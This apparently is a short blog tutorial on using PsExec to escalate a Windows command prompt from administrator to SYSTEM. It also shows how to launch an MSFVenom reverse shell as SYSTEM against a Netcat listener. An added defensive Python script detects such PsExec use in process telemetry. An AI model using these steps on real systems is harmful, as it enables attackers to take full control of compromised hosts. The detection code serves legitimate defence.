This post is about elevating your CMD to SYSTEM access. Let’s get started!
You will need:
- Psexec.exe (Sysinternals tool)
- Local administrator privileges
First, launch CMD with administrative privileges if you are on a GUI. Otherwise, make sure you are on an admin account in a reverse/bind shell.
Local spawn CMD
In your CMD:
> Psexec.exe -s -i cmd.exe
Make sure you have a compiled EXE file, which can be a reverse shell generated with MSFVenom. Start a Netcat listener on the port you specified when creating the reverse shell. In your CMD:
> Psexec.exe -s -i msfRevShell.exe
It should show you this when you run the
> whoami
nt authority\system
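For the defender's side of the two commands above, here is an added example (not part of the original post) that flags them in process-creation telemetry. The field names follow Sysmon's process-creation event, `PSEXESVC.exe` is PsExec's default service binary, and the sample events and the `LAB\alice` account are constructed.

```python
import ntpath
import shlex

PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe"}
PSEXEC_SERVICE = "psexesvc.exe"  # default service binary; PsExec -r can rename it
VALUE_FLAGS = {"-u", "-p", "-n", "-r", "-w", "-a"}  # PsExec flags followed by a value

def _exe_name(path):
    name = ntpath.basename(path.strip('"')).lower()
    return name if name.endswith(".exe") else name + ".exe"

def psexec_system_target(command_line):
    """Return the program a PsExec call starts as SYSTEM (-s), else None."""
    try:
        argv = shlex.split(command_line, posix=False)  # keeps Windows backslashes
    except ValueError:  # unbalanced quotes
        return None
    if not argv or _exe_name(argv[0]) not in PSEXEC_IMAGES:
        return None
    as_system, i = False, 1
    while i < len(argv):
        tok = argv[i].lower()
        if tok in VALUE_FLAGS:
            i += 1  # skip the flag's value
        elif tok == "-i" and i + 1 < len(argv) and argv[i + 1].isdigit():
            i += 1  # optional session id after -i
        elif tok.startswith("-"):
            as_system = as_system or tok == "-s"
        elif not tok.startswith("\\\\"):  # not a \\computer target: the program
            return argv[i].strip('"') if as_system else None
        i += 1
    return None

def triage(events):
    findings = []
    for ev in events:
        target = psexec_system_target(ev["CommandLine"])
        if target:
            findings.append(("psexec -s", target))
        elif (_exe_name(ev["ParentImage"]) == PSEXEC_SERVICE
              and ev["User"].upper() == "NT AUTHORITY\\SYSTEM"):
            findings.append(("SYSTEM child of PSEXESVC", ev["Image"]))
    return findings

SAMPLE_EVENTS = [dict(zip(("Image", "CommandLine", "User", "ParentImage"), r)) for r in [  # constructed
    (r"C:\Tools\PsExec.exe", "Psexec.exe -s -i cmd.exe", r"LAB\alice", r"C:\Windows\System32\cmd.exe"),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe", r"NT AUTHORITY\SYSTEM", r"C:\Windows\PSEXESVC.exe"),
    (r"C:\Tools\PsExec64.exe", r'"C:\Tools\PsExec64.exe" -accepteula -i 1 notepad.exe', r"LAB\alice", r"C:\Windows\System32\cmd.exe"),
]]
```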
I hope this post has been helpful to you.